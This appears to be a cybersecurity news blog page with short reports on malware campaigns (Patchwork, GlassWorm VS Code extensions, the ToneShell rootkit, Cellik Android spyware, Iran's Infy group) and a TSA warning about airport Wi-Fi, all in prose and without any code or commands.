In a related disclosure, researchers linked Patchwork, also known as Maha Grass or Dropping Elephant, to espionage campaigns targeting Pakistan’s defense sector. These attacks used phishing emails with ZIP attachments containing MSBuild project files that abuse msbuild.exe to install a Python-based backdoor. The malware can communicate with command servers, execute Python modules, run commands, and transfer files.

Patchwork has also been associated with a previously undocumented trojan named StreamSpy. Delivered through ZIP archives hosting an executable named Annexure.exe, StreamSpy collects system information, establishes persistence through registry entries, scheduled tasks, or startup shortcuts, and communicates using both WebSocket and HTTP. WebSocket channels are used for command delivery and result transmission, while HTTP handles file transfers. Researchers observed technical similarities between StreamSpy, Spyder, and other malware families, indicating shared infrastructure and continued collaboration among related threat groups.



Read more »
Malware Attack
GlassWorm malware Malware Attack

GlassWorm Malware Returns with MacOS-focused Attack via VS Code Extensions

 

A fourth wave of the GlassWorm malware campaign is targeting macOS developers through malicious extensions distributed on the OpenVSX registry and the Microsoft Visual Studio Marketplace, according to researchers at Koi Security. 

The campaign involves compromised extensions designed for VS Code compatible editors. These extensions, which typically add productivity tools or language support, have been weaponised to deliver malware that steals developer credentials and cryptocurrency data. 

GlassWorm was first identified in October after being hidden inside extensions using invisible Unicode characters. Once installed, the malware attempted to harvest login details for GitHub, npm and OpenVSX accounts, as well as data from cryptocurrency wallet extensions. 

It also enabled remote access via VNC and allowed attackers to route traffic through infected systems using a SOCKS proxy. Despite public disclosure and additional safeguards, the malware resurfaced in early November on OpenVSX and again in early December on the VS Code marketplace. 

In the latest campaign, researchers observed a shift in tactics. The new wave targets macOS systems exclusively, unlike earlier versions that focused on Windows. The malware now uses an AES 256 CBC encrypted payload embedded in compiled JavaScript within OpenVSX extensions, rather than invisible Unicode characters or compiled Rust binaries. 

The identified extensions include studio velte distributor pro svelte extension, cudra production vsce prettier pro and puccin development full access catppuccin pro extension. The malicious code activates after a 15 minute delay, likely to avoid detection in automated analysis environments. 

Persistence is achieved through macOS LaunchAgents, and AppleScript is used instead of PowerShell. The campaign continues to rely on a Solana blockchain based command and control mechanism, with infrastructure overlaps seen across earlier waves. 

Koi Security said the malware now attempts to extract macOS Keychain passwords and checks for installed hardware wallet applications such as Ledger Live and Trezor Suite. 

If found, it attempts to replace them with trojanised versions. Researchers noted that this feature is currently not functioning as intended, with the substituted wallet files appearing empty. 

According to Koi Security, all other malicious capabilities remain active, including credential theft, data exfiltration and system persistence. 

OpenVSX has flagged warnings for two of the identified extensions, citing unverified publishers. While download figures show more than 33,000 installs, researchers warned that such metrics are often inflated to create a false sense of legitimacy. 

Developers who installed any of the affected extensions are advised to remove them immediately, reset GitHub passwords, revoke npm access tokens and check systems for compromise. Reinstalling the operating system may be necessary in cases of confirmed infection.
Read more »
ToneShell
cyber espionage Kapersky Kernel malware ToneShell

Advanced Rootkit Used to Conceal ToneShell Malware in Targeted Cyberespionage Attacks

 



Cybersecurity researchers have brought to light a new wave of cyberespionage activity in which government networks across parts of Asia were quietly compromised using an upgraded version of the ToneShell backdoor. What sets this campaign apart is the method used to hide the malware. Instead of relying solely on user-level tools, the attackers deployed a kernel-mode component that operates deep within the Windows operating system, allowing the intrusion to remain largely invisible.

The activity has been linked with high confidence to a China-aligned cyberespionage group that has a long history of targeting government agencies, policy institutions, non-governmental organizations, and research bodies. Investigators say the campaign reflects a continued focus on long-term intelligence collection rather than short-lived attacks.

The findings come from an investigation by Kaspersky, which identified malicious system drivers on compromised machines in countries including Myanmar and Thailand. Evidence suggests the campaign has been active since at least February 2025. In several cases, the affected systems had previously been infected with older espionage tools tied to the same threat ecosystem, indicating that access was maintained and expanded over time.

At the centre of the operation is a malicious kernel-mode driver disguised as a legitimate system component. The driver is digitally signed using an older certificate that appears to have been improperly reused, helping it avoid immediate suspicion during installation. Once active, it acts as a rootkit, injecting hidden code into normal processes and blocking attempts by security software to detect or remove it.

The driver protects itself aggressively. It prevents its files and registry entries from being altered, assigns itself a high execution priority, and interferes with Microsoft Defender by stopping key components from fully loading. While malicious code is running, it temporarily blocks access to infected processes, removing those restrictions afterwards to leave fewer traces behind.

The ToneShell backdoor delivered by this loader has also been updated. Earlier versions used a longer and more distinctive system identifier. The new variant switches to a shorter four-byte host marker, making individual infections harder to track. Its network traffic has been altered as well, with communications disguised to resemble legitimate encrypted web connections through the use of fake security headers.

Once installed, the backdoor gives attackers broad control over compromised systems. It can stage data in temporary files, upload and download information, cancel transfers when needed, open interactive remote command sessions, execute instructions in real time, and close connections cleanly to reduce forensic evidence. These features point to a tool designed for sustained, low-noise espionage rather than disruptive attacks.

Kaspersky warns that detecting this activity requires more than standard file scanning. Because much of the malicious behaviour occurs in memory and at the kernel level, advanced memory forensics are critical for uncovering infections. The researchers note that the campaign demonstrates a clear shift toward greater stealth and resilience, underscoring the growing sophistication of modern cyberespionage operations.

Read more »
User Privacy
Android Spyware Cellik Credential Theft malware User Privacy

Cellik Android Spyware Exploits Play Store Trust to Steal Data

 

Recently found in the Android platform, remote access trojan named Cellik has been recognized as a serious mobile threat, using the Google Play integration feature to mask itself within legitimate applications to evade detection by security solutions.

Cellik is advertised as a malware-as-a-service (MaaS) in the cybercrime forums, with membership rates beginning at approximately $150 a month. One of the most frightening facets of the malware is the fact that it allows malicious payloads to be injected into legitimate Google Play applications, which can be easily installed. 

Once it is installed, Cellik provides complete control over the target device for the attacker. Operators can remotely stream the target device’s screen live, as well as access all files, receive notifications, and even use a stealthy browser to surf websites and enter form data without the target’s awareness. The malware also comes equipped with an app inject functionality that enables attackers to superimpose login screens on normal applications such as bank or email apps and harvest login and other sensitive data. 

Cellik Play Store integration also includes an automated APK builder, so the perpetrators of this crimeware can now browse the store for apps, choose popular apps, and pack them with the Cellik payload in one click bundling it together with the cellik payload. The perpetrators of this attack claim that this allows them to bypass Google Play Protect and other device-based security scanners, but Google has not independently verified this. 

Android users should heed the words of security experts and not sideload APKs from unknown sources, keep Play Protect enabled at all times, be very judicious about app permissions, and keep an eye out for anything strange on their phones that might be harmful. Since Cellik is a groundbreaking new development in Android malware, both users and the security community should be vigilant to ensure their sensitive data and device integrity are not compromised.
Read more »
WiFi Hotspot Spoofing
Airport WiFi Security Endpoint Device Security malware Man in the Middle Attacks Mobile Malware Threats Public WiFi Risks USB Port VPN for Travel WiFi Hotspot Spoofing

TSA Cautions Travelers on Public Wi-Fi Security Threats

 


There are growing concerns about digital safety as global travel surges during one of the busiest mobility windows of the year, and airport advisory boards are increasingly focusing on digital safety. 

As a result of the renewed warning from the Transportation Security Administration, travelers are advised to be cautious when charging their own personal devices inside terminals, especially as both physical charging points and public internet networks are becoming increasingly vulnerable to cyber attack.

An international security agency has issued a warning against using public USB charging ports that are found in airports around the world, citing the possibility that embedded malware can compromise an electronic device, according to a recent statement released on social media. There were many concerns raised about this holiday season, with the administration stating that free airport Wi-Fi networks are unreliable and unsecured. 

The administration stressed that this could create a fertile ground for hackers to target sensitive personal and corporate data during the holiday season. This alert extended beyond wired connections. It is becoming increasingly common for public Wi-Fi to be a staging point for information theft among millions of passengers navigating crowded terminals, particularly when traveling during peak travel season, because there is a high risk of information theft, particularly for business travelers, whose financial and operational consequences can be severe. 

A number of risk mitigation tools, including VPNs and offline safeguards, provide partial protection against cyberattacks, but authorities emphasize that prevention remains the most effective form of defense. It is recommended that travelers download entertainment and reading materials before arriving at airports as well as essential files in order to minimize their risk of exposure to digital threats. 

As the global travel and remote work industries continue to expand the digital attack surface, security firms have begun voicing their alarm over public Wi-Fi exposure. Several days ago, a leading provider of mobile defense solutions, Zemperium, warned smartphone users that when they travel, when they tend to lose sight of device security habits and awareness, they should remain vigilant. 

The firm emphasized that ubiquitous free wireless connectivity—whether in airports, hotels, cafes, or ride-share transit zones—has created predictable entry points that attackers are exploiting increasingly accurately in recent years. According to the company, which is echoing earlier warnings from the Transportation Security Administration, travelers will experience an increase in vulnerability to attacks due to the traveling environment, and these vulnerabilities will be heightened significantly if the passengers move through urban areas with a high density of population. 

A number of U.S. metropolitan centers are showing an increase in mobile malware activity, including Los Angeles, New York, Portland, Miami, and Seattle, where mobile malware is becoming increasingly sophisticated and more prevalent than ever before. The firm has emphasized that international travel is one of the most important concerns in the world. Industry leaders have pointed out that this issue extends far beyond smartphones alone, as well. 

According to David Matalon, a founder of the company Venn that provides secure workspaces, as remote working becomes the norm in the long run, employees tend to connect their personal laptops and mobile devices to unsecured public networks, which are often outside the monitoring of corporate security protocols. 

In light of this shift in business travelers' mindsets, compromised devices may serve as unintended conduits for access to company systems that are unmonitored. Several cybersecurity experts, including those from Zimperium, have cautioned that breaches in mobile devices can quickly evolve into access gateways into more widespread corporate intrusions if security controls are not enforced, or endpoint visibility is lacking. 

Analysts from SlashNext, a threat-prevention firm, as well as endpoint defense experts, have also warned that mobile devices remain high-value targets, particularly when users download applications that are not from official sources or connect to open networks that are not protected from attacks. 

A number of security experts, including J Stephen Kowski, who works for SlashNext, have emphasized that enterprise security teams need to expand endpoint oversight and enforce stricter policies to prevent unsafe network connections and unauthorised applications from getting through, particularly as mobile endpoints increasingly interrelate with corporate environments. 

Due to the sheer amount of travelers who use complimentary Wi-Fi networks in airports as a source of information, the TSA's advisory is particularly important given how frequently travelers check their itinerary, get their boarding information, or download stuff last minute before they leave. There has been a strong emphasis on the fact that the vulnerability that was flagged by the government echoes the risks associated with public Wi-Fi networks, which tend to operate without encryption or verification layers. 

Google has previously advised users to avoid public networks, describing them as unencrypted and easy to manipulate by cybercriminals, echoes similar concerns. Although digital safety advocates point out that a lot of the challenges are faced, a lot of it is not a matter of specialized technical knowledge that can be overcome, but rather disciplined browsing behavior and layers of protection. 

According to industry data, a significant portion of the internet ecosystem is now using encrypted HTTPS instead of the unsecured HTTP protocol, which is widely used by service providers to protect their data transmissions. By the year 2023, roughly 95 percent of Google's services should have migrated to HTTPS. In contrast to earlier internet infrastructure, where intercepted data packets were exchanged in plaintext, intercepted data packets will remain encrypted. 

It has been noted that platforms like Chrome and Firefox offer HTTPS-only mode to further strengthen browser-level security, resulting in a further restriction on access to unencrypted endpoints. Furthermore, VPN usage has been shown to be one of the most reliable safeguards for travelers accessing cloud storage, financial accounts, or internal corporate systems, especially when they are travelling on business and face higher operational and financial consequences. 

In addition to cybersecurity experts like Norton, regulatory agencies such as the U.S. Federal Trade Commission and the U.S. Consumer Protection Agency have also warned travelers that they should disable Bluetooth, file-sharing functions, and other open-channel device connectivity when inside terminals, along with enabling multi-factor authentication to access their accounts. 

A number of key warning signs, such as public networks that bypass login screens, captive portals, or terms-and-conditions of service agreements, are increasingly recognized as red flags for malicious spoofing, and these are becoming increasingly prominent. 

A consensus among digital defense analysts is that casual browsing, such as checking flight schedules, interacting with social media, or streaming entertainment, is deemed to pose a low risk. On open airport networks, authenticated portals and sensitive login-based services should be avoided as much as possible, unless protective measures are taken to keep users safe. 

A security breach of a public Wi-Fi network has emerged as one of the most pressing challenges facing travelers today, particularly in international transit hubs, where free wireless networks are often used as a default function rather than a security risk. 

Airports, according to cybersecurity analysts, present a particularly attractive environment for malicious actors due to the fact that their networks are unencrypted, not to mention that cybercriminals are deploying counterfeit Wi-Fi hotspots that resemble legitimate service names, which have become increasingly popular among cybercriminals. 

The fraudulent network is often labeled with a familiar-sounding name to attract hurried passengers to it without checking the source, and is often marketed with familiar-sounding identifiers. An attacker can silently observe data traffic flowing over an unsecured network for an extended period of time by using man-in-the-middle attack methods, injecting malware into the active session, or even capturing saved credentials and personal files once a device joins the network. 

A number of experts indicate that the consequences go beyond individual privacy, particularly for business travelers, who can inadvertently serve as entry points into corporate systems through the use of personal laptops and smartphones, which have become increasingly popular for remote working. There have been many voices throughout the industry which have stressed the importance of taking preventative measures rather than waiting for technical expertise.

One of the most widely accepted safeguards for mobile hotspots is the use of Virtual Private Networks, which allow a secure connection between a device and an external server that is encrypted. During 2024, Eric Plam, a senior executive at mobile hotspot provider SIMO, said VPN frameworks provide a security buffer between the devices and the servers they access, an important measure to take when dealing with congested terminals where digital surveillance is much easier to accomplish. 

It is not only encryption that has gained popularity among frequent travelers, but also the ancillary benefits such as airfare comparisons and hotel bookings by region. As airlines calibrate pricing based on market, analysts have observed several cost-effective flight purchase regions, such as India, Malaysia, Thailand, Mexico, Argentina, Brazil, Sri Lanka, the Philippines, and Turkey, that are among the most cost-efficient flight purchase regions. 

In addition to alternative connectivity options, security researchers have also highlighted the importance of avoiding public networks altogether as a means of connecting passengers. By using physical international SIM cards or preactivated eSIM services such as Airalo's, travelers can ensure that they have protected mobile data access without having to deal with unsecured wireless networks. 

The mobile industry is also doing its part to strengthen device-level network privacy, as Samsung, for instance, has recently introduced enhanced public-network security protocols for its smartphones, which gives users a better chance of connecting to open networks without having to worry about theft. Though digital defense specialists claim that the safest networks are usually those one travelers do not have to use, despite these advances. 

On public Wi-Fi, authorities and independent experts have consistently urged passengers to avoid logging into banking platforms, email portals, internal dashboards, or any authentication-protected service while on the internet. 

As a precaution, travelers are advised to download the boarding passes, tickets, media libraries, podcasts and playlists before arriving at terminals to minimize both the risk involved and the dependence upon free wireless internet. 

According to experts in the field of security, as travel becomes more digitized, the conversation must switch from awareness to habit. The warnings about public charging ports and unsecured Wi-Fi are not intended to discourage travelers from connecting, but rather to alter how travelers interact with each other in transient environments where anonymity benefits attackers more than the travelers.

In addition to pre-downloading essentials, cybersecurity analysts advise travelers to prevent accidental connection by enabling automatic network blocking on their devices, keeping their operating systems current, and regularly clearing stored Wi-Fi networks to prevent accidents. 

In order to secure the devices, even when they are used outside managed office networks, firms are increasingly recommending browser isolation tools, encrypted cloud access gateways, and endpoint monitoring applications for corporate travelers. Observers in the industry also point to a silver lining as well. 

As mobile security innovations accelerate, from encryption to device-level threat defense to safer global adoption of e-SIM cards, passengers have access to options that were not available a decade ago. In spite of this, digital defense leaders keep reassuring their clients that they must remain disciplined in order to keep their data secure. 

Experts say that the freedom of choice should never outweigh the cost of compromise, especially where one must make a decision that impacts millions of people each day Overcoming our evolving landscape of travel security, experts believe that preparation, layers of protection, and thoughtful connectivity are the driving factors that will establish the safest journeys forward.
Read more »
Malwares
cyber espionage Cyber Espionage Campaign Cyberattacks cybersecurity risks Iran Iranian malware Malware Attack Malwares

Iranian Infy Prince of Persia Cyber Espionage Campaign Resurfaces

 

Security researchers have identified renewed cyber activity linked to an Iranian threat actor known as Infy, also referred to as Prince of Persia, marking the group’s re-emergence nearly five years after its last widely reported operations in Europe and the Middle East. According to SafeBreach, the scale and persistence of the group’s recent campaigns suggest it remains an active and capable advanced persistent threat. 

Infy is considered one of the longest-operating APT groups, with its origins traced back to at least 2004. Despite this longevity, it has largely avoided the spotlight compared with other Iranian-linked groups such as Charming Kitten or MuddyWater. Earlier research attributed Infy’s attacks to a relatively focused toolkit built around two primary malware families: Foudre, a downloader and reconnaissance tool, and Tonnerre, a secondary implant used for deeper system compromise and data exfiltration. These tools are believed to be distributed primarily through phishing campaigns. 

Recent analysis from SafeBreach reveals a previously undocumented campaign targeting organizations and individuals across multiple regions, including Iran, Iraq, Turkey, India, Canada, and parts of Europe. The operation relies on updated versions of both Foudre and Tonnerre, with the most recent Tonnerre variant observed in September 2025. Researchers noted changes in initial infection methods, with attackers shifting away from traditional malicious macros toward embedding executables directly within Microsoft Excel documents to initiate malware deployment. 

One of the most distinctive aspects of Infy’s current operations is its resilient command-and-control infrastructure. The malware employs a domain generation algorithm to rotate C2 domains regularly, reducing the likelihood of takedowns. Each domain is authenticated using an RSA-based verification process, ensuring that compromised systems only communicate with attacker-approved servers. SafeBreach researchers observed that the malware retrieves encrypted signature files daily to validate the legitimacy of its C2 endpoints.

Further inspection of the group’s infrastructure uncovered structured directories used for domain verification, logging communications, and storing exfiltrated data. Evidence also suggests the presence of mechanisms designed to support malware updates, indicating ongoing development and maintenance of the toolset. 

The latest version of Tonnerre introduces another notable feature by integrating Telegram as part of its control framework. The malware is capable of interacting with a specific Telegram group through its C2 servers, allowing operators to issue commands and collect stolen data. Access to this functionality appears to be selectively enabled for certain victims, reinforcing the targeted nature of the campaign. 

SafeBreach researchers also identified multiple legacy malware variants associated with Infy’s earlier operations between 2017 and 2020, highlighting a pattern of continuous experimentation and adaptation. Contrary to assumptions that the group had gone dormant after 2022, the new findings indicate sustained activity and operational maturity over the past several years. 

The disclosure coincides with broader research into Iranian cyber operations, including analysis suggesting that some threat groups operate with structured workflows resembling formal government departments. Together, these findings reinforce concerns that Infy remains a persistent espionage threat with evolving technical capabilities and a long-term strategic focus.
Read more »
Subscribe to: Comments (Atom)